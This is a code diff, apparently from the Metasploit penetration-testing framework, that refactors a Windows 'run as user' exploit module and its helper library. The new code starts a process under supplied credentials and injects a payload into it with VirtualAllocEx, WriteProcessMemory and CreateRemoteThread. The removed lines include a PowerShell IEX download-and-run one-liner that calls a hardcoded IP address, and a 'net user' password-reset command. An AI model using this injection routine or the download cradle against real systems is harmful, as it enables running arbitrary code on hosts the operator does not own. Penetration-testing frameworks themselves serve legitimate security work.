Refactor and fixes for post module

Author: Meatballs1

lib/msf/core/post/windows/runas.rb

@@ -79,11 +79,7 @@ def create_process_with_logon(domain, user, password, application_name, command_
     if logon_user['return']
       begin
         ph_token = logon_user['phToken']
-        vprint_status("Executing GetUserProfileDirectoryW...")
-        get_profile_dir = session.railgun.userenv.GetUserProfileDirectoryW(ph_token, MAX_PATH*2, MAX_PATH*2)
-        str_length = get_profile_dir['lpcchSize']
-        profile_path = get_profile_dir['lpProfileDir'][0, str_length]
-        vprint_status("Executing CreateProcessWithLogonW #{application_name} #{command_line}...")
+        vprint_status("Executing CreateProcessWithLogonW: #{application_name} #{command_line}...")
         create_process = session.railgun.advapi32.CreateProcessWithLogonW(user,
                                                                           domain,
                                                                           password,
@@ -92,16 +88,11 @@ def create_process_with_logon(domain, user, password, application_name, command_
                                                                           command_line,
                                                                           'CREATE_UNICODE_ENVIRONMENT',
                                                                           nil,
-                                                                          nil, # profile_path,
+                                                                          nil,
                                                                           startup_info,
                                                                           16)
         if create_process['return']
-          begin
-            pi = parse_process_information(create_process['lpProcessInformation'])
-          ensure
-            session.railgun.kernel32.CloseHandle(pi[:process_handle])
-            session.railgun.kernel32.CloseHandle(pi[:thread_handle])
-          end
+          pi = parse_process_information(create_process['lpProcessInformation'])
           print_good("Process started successfully, PID: #{pi[:process_id]}")
         else
           print_error("Unable to create process, Error Code: #{create_process['GetLastError']} - #{create_process['ErrorMessage']}")
@@ -121,7 +112,9 @@ def create_process_with_logon(domain, user, password, application_name, command_
 
   # Can be used by SYSTEM processes with the SE_INCREASE_QUOTA_NAME and
   # SE_ASSIGNPRIMARYTOKEN_NAME privileges.
-  # This will normally error with 0xc000142 on later OS's (Vista+?)...
+  #
+  # This will normally error with 0xc000142 on later OS's (Vista+?) for
+  # gui apps but is ok for firing off cmd.exe...
   def create_process_as_user(domain, user, password, application_name, command_line)
     return unless check_user_format(user, domain)
     return unless check_command_length(application_name, command_line, 32000)

modules/exploits/windows/local/run_as.rb

@@ -7,132 +7,118 @@
 require 'rex'
 
 class Metasploit3 < Msf::Exploit::Local
-  include Msf::Post::File
-  include Msf::Post::Windows::Priv
-  include Msf::Exploit::Powershell
+
   include Msf::Post::Windows::Runas
 
   def initialize(info={})
     super(update_info(info,
-      'Name'                 => "Windows Manage Run Command As User",
+      'Name'                 => "Windows Run Command As User",
       'Description'          => %q{
         This module will login with the specified username/password and execute the
-        supplied command as a hidden process. Output is not returned by default, by setting
-        CMDOUT to false output will be redirected to a temp file and read back in to
-        display.By setting advanced option SETPASS to true, it will reset the users
-        password and then execute the command.
+        supplied command as a hidden process. Output is not returned by default.
+        Unless targetting a local user either set the DOMAIN, or specify a UPN user
+        format (e.g. user@domain). This uses the CreateProcessWithLogonW WinAPI function.
+
+        A custom command line can be sent instead of uploading an executable.
+        APPLICAITON_NAME and COMMAND_LINE are passed to lpApplicationName and lpCommandLine
+        respectively. See the MSDN documentation for how these two values interact.
       },
       'License'              => MSF_LICENSE,
       'Platform'             => ['win'],
       'SessionTypes'         => ['meterpreter'],
-      'Author'               => ['Kx499'],
-      'Targets' => [ [ 'Universal', {} ] ],
-      'DefaultTarget' => 0
+      'Author'               => ['Kx499', 'Ben Campbell'],
+      'Targets'              => [
+        [ 'Automatic', { 'Arch' => [ ARCH_X86 ] } ]
+      ],
+      'DefaultTarget'        => 0,
+      'References'           =>
+        [
+          [ 'URL', 'https://msdn.microsoft.com/en-us/library/windows/desktop/ms682431' ]
+        ]
     ))
 
     register_options(
       [
-        OptString.new('DOMAIN', [true, 'Domain to login with' ]),
+        OptString.new('DOMAIN', [false, 'Domain to login with' ]),
         OptString.new('USER', [true, 'Username to login with' ]),
         OptString.new('PASSWORD', [true, 'Password to login with' ]),
-        OptString.new('APPLICATION_NAME', [false, 'Application to be executed (lpApplicationName)']),
-        OptString.new('COMMAND_LINE', [true, 'Command line to execute (lpCommandLine)']),
-      ], self.class)
-
-    register_advanced_options(
-      [
-        OptBool.new('CMDOUT', [true, 'Retrieve command output', false]),
-        OptBool.new('SETPASS', [true, 'Reset password', false])
+        OptString.new('APPLICATION_NAME', [false, 'Application to be executed (lpApplicationName)', nil ]),
+        OptString.new('COMMAND_LINE', [false, 'Command line to execute (lpCommandLine)', nil ]),
+        OptBool.new('USE_CUSTOM_COMMAND', [true, 'Specify custom APPLICATION_NAME and COMMAND_LINE', false ])
       ], self.class)
   end
 
-  # Check if sufficient privileges are present for certain actions and run getprivs for system
-  # If you elevated privs to system,the SeAssignPrimaryTokenPrivilege will not be assigned. You
-  # need to migrate to a process that is running as
-  # system. If you don't have privs, this exits script.
-  def priv_check
-    if is_system?
-      privs = session.sys.config.getprivs
-      if privs.include?("SeAssignPrimaryTokenPrivilege") and privs.include?("SeIncreaseQuotaPrivilege")
-        @isadmin = false
-        return true
-      else
-        return false
-      end
-    elsif is_admin?
-      @isadmin = true
-      return true
-    else
-      return false
-    end
-  end
-
-  def reset_pass(user, password)
-    cmd = "cmd.exe /c net user #{user} #{password}"
-    r = cmd_exec(cmd)
-    return r.include?("successfully")
-  end
-
   def exploit
-    fail_with(Exploit::Failure::BadConfig, "Must be a meterpreter session")  if session.sys.config.sysinfo.type != "meterpreter"
-
-    # check/set vars
-    cmdout = datastore["CMDOUT"]
-    user = datastore["USER"]
-    password = datastore["PASS"]
-    application_name = datastore['APPLICATION_NAME']
-    command_line = datastore["COMMAND_LINE"]
-    domain = datastore['DOMAIN']
-
-    cmd = cmd_psh_payload(payload.encoded, payload_instance.arch.first, encode_final_payload: true, remove_comspec: true)
+    fail_with(Exploit::Failure::BadConfig, 'Must be a meterpreter session') unless session.type == 'meterpreter'
 
-    cmdstr = 'powershell.exe -C IEX ((new-object net.webclient).downloadstring(\'http://192.168.5.101:8080/x86\'))'
+    domain = datastore['DOMAIN']
+    user = datastore['USER']
+    password = datastore['PASSWORD']
 
-    if is_system?
-      puts create_process_as_user(domain,
-                             user,
-                             password,
-                             application_name,
-                             command_line)
+    if datastore['USE_CUSTOM_COMMAND']
+      application_name = datastore['APPLICATION_NAME']
+      command_line = datastore['COMMAND_LINE']
     else
-      puts create_process_with_logon(domain,
-                                     user,
-                                     password,
-                                     application_name,
-                                     command_line)
-
-      #print_error("Insufficient Privileges, either you are not Admin or system or you elevated")
-      #print_error("privs to system and do not have sufficient privileges. If you elevated to")
-      #print_error("system, migrate to a process that was started as system (srvhost.exe)")
-      #return 0
+      command_line = nil
+      windir = get_env('windir')
+
+      # Select path of executable to run depending the architecture
+      case client.platform
+      when /x86/
+        application_name = "#{windir}\\System32\\notepad.exe"
+      when /x64/
+        application_name = "#{windir}\\SysWOW64\\notepad.exe"
+      end
     end
 
-    return
-
-    # Only process file if the process creation was successful, delete when done, give us info
-    # about process
-    if cs["return"]
-      tmpout = ""
-      if cmdout
-        outfile = session.fs.file.new(outpath, "rb")
-        until outfile.eof?
-          tmpout << outfile.read
-        end
-        outfile.close
-        c = session.sys.process.execute("cmd.exe /c del #{outpath}", nil, {'Hidden' => true})
-        c.close
+    pi = create_process_with_logon(domain,
+                              user,
+                              password,
+                              application_name,
+                              command_line)
+
+    return unless pi
+
+    begin
+      return if datastore['USE_CUSTOM_COMMAND']
+
+      vprint_status('Injecting payload into target process')
+      raw = payload.encoded
+      process_handle = pi[:process_handle]
+      virtual_alloc = session.railgun.kernel32.VirtualAllocEx(process_handle,
+                                              nil,
+                                              raw.length,
+                                              'MEM_COMMIT|MEM_RESERVE',
+                                              'PAGE_EXECUTE_READWRITE')
+
+
+      address = virtual_alloc['return']
+      fail_with(Exploit::Failure::Unknown, "Unable to allocate memory in target process: #{virtual_alloc['ErrorMessage']}") if address == 0
+
+      write_memory = session.railgun.kernel32.WriteProcessMemory(process_handle,
+                                                                 address,
+                                                                 raw,
+                                                                 raw.length,
+                                                                4)
+
+      fail_with(Exploit::Failure::Unknown,
+                "Unable to write memory in target process @ 0x#{address.to_s(16)}: #{write_memory['ErrorMessage']}") unless write_memory['return']
+
+      create_remote_thread = session.railgun.kernel32.CreateRemoteThread(process_handle,
+                                                  nil,
+                                                  0,
+                                                  address,
+                                                  nil,
+                                                  0,
+                                                  4)
+      if create_remote_thread['return'] == 0
+        print_error("Unable to create remote thread in target process: #{create_remote_thread['ErrorMessage']}")
+      else
+        print_good("Started thread in target process")
       end
-
-      pi = cs["lpProcessInformation"].unpack("LLLL")
-      print_status("Command Run: #{cmdstr}")
-      print_status("Process Handle: #{pi[0]}")
-      print_status("Thread Handle: #{pi[1]}")
-      print_status("Process Id: #{pi[2]}")
-      print_status("Thread Id: #{pi[3]}")
-      print_line(tmpout)
-    else
-      print_error("#{cs["ErrorMessage"]}")
-      return 0
+    ensure
+      session.railgun.kernel32.CloseHandle(pi[:process_handle])
+      session.railgun.kernel32.CloseHandle(pi[:thread_handle])
     end
   end
 end